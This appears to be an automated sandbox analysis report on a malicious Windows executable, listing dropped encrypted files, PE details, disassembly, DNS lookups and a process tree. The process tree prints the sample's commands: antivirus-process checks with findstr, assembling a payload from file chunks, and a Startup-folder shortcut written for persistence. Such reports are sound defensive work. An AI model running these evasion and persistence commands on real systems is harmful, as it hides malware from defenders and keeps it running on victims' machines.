                                                    SHA-512:921D7B873A99C0665F32AAC000CEBBE3BF6A0D9CB8D82E6305083EFE57023971613EBB32956476DAE3ED7DCD71C7796F75D12A1840B1928845E47AA3645211C9
                                                    Malicious:true
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):59392
                                                    Entropy (8bit):7.99700719991649
                                                    Encrypted:true
                                                    SSDEEP:1536:kSgReDsZ2S57pfLb2Uf5c5saqKuvaRt4pn/GoUVjSoKgLWmHjJlym:kSZopbSpqKuk2puHgoKgLBHjJgm
                                                    MD5:C9E306D19DEF703774D08975E553263B
                                                    SHA1:8AB1DE74C5C1A45ABB93D0996C6D58F1530D4A4D
                                                    SHA-256:E2CC14D5C33F5A9799D81683F017914C0C568FF4F634D5CDAA69DC086C01F88E
                                                    SHA-512:8CEA19182FCEEDF07C81A7E5C9ED35E17591484C7BA4728EC65737E7E2ECFAFD288E656E036BF74E52E20EDED358223E058F5DEB8D9FF435EFB1B00FD94B51BA
                                                    Malicious:true
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):53248
                                                    Entropy (8bit):7.996397386083232
                                                    Encrypted:true
                                                    SSDEEP:1536:VDObOdYwNIGtwKnEscdKdnZ715rJVe6LODXFxLU:VDNdE4w6KC35DeXXFxQ
                                                    MD5:26BFCB75C4F0FF69CEDE2EAEF6CBEC06
                                                    SHA1:41D437AAAC0ACAA0D98C4FDA6586A61979B25F13
                                                    SHA-256:7BE8B9F51B43F525D0140EDC5502BE3A6E7BCBD876DDDE442FABAD43B6D19B36
                                                    SHA-512:126740665893FC6F775A8BF31CA7CC243CFE26A84A61752BADAA684DD156E08D6F473AF7F0C9796A8062C8A67AD873B0AA9DFC44679C84C4CC83ECFB63317381
                                                    Malicious:true
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):97280
                                                    Entropy (8bit):7.998052732299105
                                                    Encrypted:true
                                                    SSDEEP:1536:Ni5X/n8JL88Im4dSgQ3QDLTTWWzDO2Phn3TYXY/EuESYwOOJltjb2It6rc8/NyS:NMXf898Fm4d6ADnTBzD1P2I/ECxLJlxi
                                                    MD5:2B1531C3961A12A05168DDBEC6DE9351
                                                    SHA1:BF02E49064C0B97400F5E54A588D02B584D0E700
                                                    SHA-256:6A1F12DCAB292378358F48014D0078407B2A141237BD7B318A83539497346FB5
                                                    SHA-512:5DB2C782FC950BBD409A551BBA32708A5A22B78779D92DAAF9C56B73B94CA8478493B15784FDE711292E87399A06C51D5898179E4B5302A0531492F330F73C57
                                                    Malicious:true
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):66560
                                                    Entropy (8bit):7.9971208270762375
                                                    Encrypted:true
                                                    SSDEEP:1536:otshYdm8KllFFnGuyxeOFGpQMpItjKYvvOfPWE:qmNllvgLGpQhDvPE
                                                    MD5:91880DAFDBDDDD3A7BECE82040731293
                                                    SHA1:B2D53F9DCB1D79F5CAE8B20604CD22DAA223287D
                                                    SHA-256:30B0CD78DBFB69528322CBD789347159AE4756A7667B889FDEF022ACC468A658
                                                    SHA-512:FDE9B03522B27033E88371270D4491DF43A5B347F20221E7932548E9565BCDC08A8B7294C62F5CCDE1AAB0236061E13D675B3D1A213CD79384FC1E50ABE46B82
                                                    Malicious:true
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):7.997070878978732
                                                    Encrypted:true
                                                    SSDEEP:1536:8cYTYhic0cJIiMbRTPZBQD3z7nYIDoncF8OZ3ChB:8cYTY8x/OgIsciOuB
                                                    MD5:597F565834790C594B894C61459C3DFB
                                                    SHA1:D47C91AFE8F194C45055622801148DE7D83A3907
                                                    SHA-256:91A36419B02C0BEE19EE66AE6DF90302AC6B64BD15D1DB74BC6682DCC03CBD17
                                                    SHA-512:2AFDB76CCAAD9995317F53886B638800743D88B8007D89E47B45706757BBA421A8C1624592E64FFB73520B5BF26D5AC4A68CD2FFE7A4F5E8ED27F943A2DD5AF6
                                                    Malicious:true
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):887994
                                                    Entropy (8bit):6.622324410902026
                                                    Encrypted:false
                                                    SSDEEP:12288:SV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:wxz1JMyyzlohMf1tN70aw8501
                                                    MD5:480B699995A5B0B846D54973B83DB3E7
                                                    SHA1:92241BB78A7A8769719D0045621C853F628F9495
                                                    SHA-256:8615162D4D1718863A131FF5E242884922AA463FE2D6B48BD8CEADD9F519CF5F
                                                    SHA-512:83495FC821564E92C90CBDFF7C7F52D6AE6A9367C9845312231E84D0246110E095358EAD78427F4A6AD9A7276D4CEE538C7C753876FA087C8918B24C1CC1A176
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >), ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):89
                                                    Entropy (8bit):4.909910437300207
                                                    Encrypted:false
                                                    SSDEEP:3:HRAbABGQaFyw3pYoMERE2J5xAGNohFMhWlc:HRYF5yjoFi23RNUFMr
                                                    MD5:F795B669B93704F72038CC30D21E74BE
                                                    SHA1:E6A488CD4A9E94DB5E68754EAAE4F47B6957BC73
                                                    SHA-256:F728B132B86B76EFB10B8FFC38D630A1B331C2D83C61B30F12E614119E2B1051
                                                    SHA-512:55422C48D41C24BA3F914B13F03F9975037D18E6FC689814E3FB5D6B60C1EBD0A581D012903238458950EF13ECA568C6E0D8D892830D42419F4B880F01757B1A
                                                    Malicious:true
                                                    Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" ..
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.988870164236672
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:ldqj18tn.exe
                                                    File size:1'656'911 bytes
                                                    MD5:574ab8397d011243cb52bef069bad2dc
                                                    SHA1:1e1cf543bb08113fec19f9d5b9c1df25ed9232f6
                                                    SHA256:b376d8b2108027a42534314eb5d82a70b06984c7dca8e91df66d00f5c6e91f20
                                                    SHA512:c3e3f7809e5540bdd59a0cd62e0c718aa024355952f7062aac9eb4b7f40009ac97072962f9799a2dd4e2194e7a8d4df8dd4636306ecb7fee6481f6befb684702
                                                    SSDEEP:49152:iEVxqQJAyCoZxV/yPHZIQDjLO7MFVrbMwjK:iSxVJA7ofVGHiMjCMFJAwW
                                                    TLSH:5375338CF9972D12D68E2BBB613291505BF87D7704B6D4EBD705D81EB23629028CDB23
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                    Icon Hash:c1c0e4ccdcc4c4dc
                                                    Entrypoint:0x403883
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:0
                                                    File Version Major:5
                                                    File Version Minor:0
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:0
                                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                    Signature Valid:
                                                    Signature Issuer:
                                                    Signature Validation Error:
                                                    Error Number:
                                                    Not Before, Not After
                                                      Subject Chain
                                                        Version:
                                                        Thumbprint MD5:
                                                        Thumbprint SHA-1:
                                                        Thumbprint SHA-256:
                                                        Serial:
                                                        Instruction
                                                        sub esp, 000002D4h
                                                        push ebx
                                                        push ebp
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        xor ebp, ebp
                                                        pop esi
                                                        mov dword ptr [esp+18h], ebp
                                                        mov dword ptr [esp+10h], 00409268h
                                                        mov dword ptr [esp+14h], ebp
                                                        call dword ptr [00408030h]
                                                        push 00008001h
                                                        call dword ptr [004080B4h]
                                                        push ebp
                                                        call dword ptr [004082C0h]
                                                        push 00000008h
                                                        mov dword ptr [00472EB8h], eax
                                                        call 00007FC43CFBC70Bh
                                                        push ebp
                                                        push 000002B4h
                                                        mov dword ptr [00472DD0h], eax
                                                        lea eax, dword ptr [esp+38h]
                                                        push eax
                                                        push ebp
                                                        push 00409264h
                                                        call dword ptr [00408184h]
                                                        push 0040924Ch
                                                        push 0046ADC0h
                                                        call 00007FC43CFBC3EDh
                                                        call dword ptr [004080B0h]
                                                        push eax
                                                        mov edi, 004C30A0h
                                                        push edi
                                                        call 00007FC43CFBC3DBh
                                                        push ebp
                                                        call dword ptr [00408134h]
                                                        cmp word ptr [004C30A0h], 0022h
                                                        mov dword ptr [00472DD8h], eax
                                                        mov eax, edi
                                                        jne 00007FC43CFB9CDAh
                                                        push 00000022h
                                                        pop esi
                                                        mov eax, 004C30A2h
                                                        push esi
                                                        push eax
                                                        call 00007FC43CFBC0B1h
                                                        push eax
                                                        call dword ptr [00408260h]
                                                        mov esi, eax
                                                        mov dword ptr [esp+1Ch], esi
                                                        jmp 00007FC43CFB9D63h
                                                        push 00000020h
                                                        pop ebx
                                                        cmp ax, bx
                                                        jne 00007FC43CFB9CDAh
                                                        add esi, 02h
                                                        cmp word ptr [esi], bx
                                                        Programming Language:
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ C ] VS2010 SP1 build 40219
                                                        • [RES] VS2010 SP1 build 40219
                                                        • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x2f3a | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x191be7 | 0x2868 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xf4000 | 0x2f3a | 0x3000 | c15fab2d5ae919ed0bc47dbc7b92bcf1 | False | 0.5292154947916666 | data | 5.37146345911248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf7000 | 0xf32 | 0x1000 | c37dbd85adbacba5815fd64300b19e35 | False | 0.5908203125 | data | 5.4190090723243225 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf41d8 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.5450569568755086
RT_DIALOG | 0xf6840 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0xf6940 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0xf6a5c | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xf6abc | 0x14 | data | English | United States | 1.1
RT_VERSION | 0xf6ad0 | 0x194 | OpenPGP Secret Key | English | United States | 0.5693069306930693
RT_MANIFEST | 0xf6c64 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 14:42:52.571007013 CET | 49357 | 53 | 192.168.2.10 | 1.1.1.1
Dec 18, 2024 14:42:52.805532932 CET | 53 | 49357 | 1.1.1.1 | 192.168.2.10
Dec 18, 2024 14:43:08.505074024 CET | 61757 | 53 | 192.168.2.10 | 1.1.1.1
Dec 18, 2024 14:43:08.644860983 CET | 53 | 61757 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 14:42:52.571007013 CET | 192.168.2.10 | 1.1.1.1 | 0xb36a | Standard query (0) | zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:43:08.505074024 CET | 192.168.2.10 | 1.1.1.1 | 0x36d7 | Standard query (0) | zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 14:42:43.776007891 CET | 1.1.1.1 | 192.168.2.10 | 0x258 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 14:42:43.776007891 CET | 1.1.1.1 | 192.168.2.10 | 0x258 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:42:52.805532932 CET | 1.1.1.1 | 192.168.2.10 | 0xb36a | Name error (3) | zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:43:08.644860983 CET | 1.1.1.1 | 192.168.2.10 | 0x36d7 | Name error (3) | zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq | none | none | A (IP address) | IN (0x0001) | false


                                                        Target ID:0
                                                        Start time:08:42:44
                                                        Start date:18/12/2024
                                                        Path:C:\Users\user\Desktop\ldqj18tn.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\ldqj18tn.exe"
                                                        Imagebase:0x400000
                                                        File size:1'656'911 bytes
                                                        MD5 hash:574AB8397D011243CB52BEF069BAD2DC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:08:42:47
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
                                                        Imagebase:0xd70000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:08:42:47
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:08:42:48
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:tasklist
                                                        Imagebase:0x7b0000
                                                        File size:79'360 bytes
                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:08:42:48
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:findstr /I "wrsa opssvc"
                                                        Imagebase:0x8b0000
                                                        File size:29'696 bytes
                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:08:42:48
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:tasklist
                                                        Imagebase:0x7b0000
                                                        File size:79'360 bytes
                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:08:42:48
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                        Imagebase:0x8b0000
                                                        File size:29'696 bytes
                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:08:42:49
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c md 704579
                                                        Imagebase:0xd70000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:08:42:49
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:findstr /V "MARTNMSPIDERRINGTONE" Mh
                                                        Imagebase:0x8b0000
                                                        File size:29'696 bytes
                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:08:42:49
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u
                                                        Imagebase:0xd70000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:08:42:49
                                                        Start date:18/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                                        Wow64 process (32bit):true
                                                        Commandline:Organizational.pif u
                                                        Imagebase:0x250000
                                                        File size:893'608 bytes
                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 8%, ReversingLabs
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:12
                                                        Start time:08:42:50
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\choice.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:choice /d y /t 5
                                                        Imagebase:0x1f0000
                                                        File size:28'160 bytes
                                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:08:42:51
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit
                                                        Imagebase:0xd70000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:08:42:51
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:08:43:03
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js"
                                                        Imagebase:0x7ff7a0a30000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:08:43:03
                                                        Start date:18/12/2024
                                                        Path:C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M"
                                                        Imagebase:0x1f0000
                                                        File size:893'608 bytes
                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 8%, ReversingLabs
                                                        Has exited:false


                                                          Execution Graph

                                                          Execution Coverage:18.2%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:21.4%
                                                          Total number of Nodes:1474
                                                          Total number of Limit Nodes:32
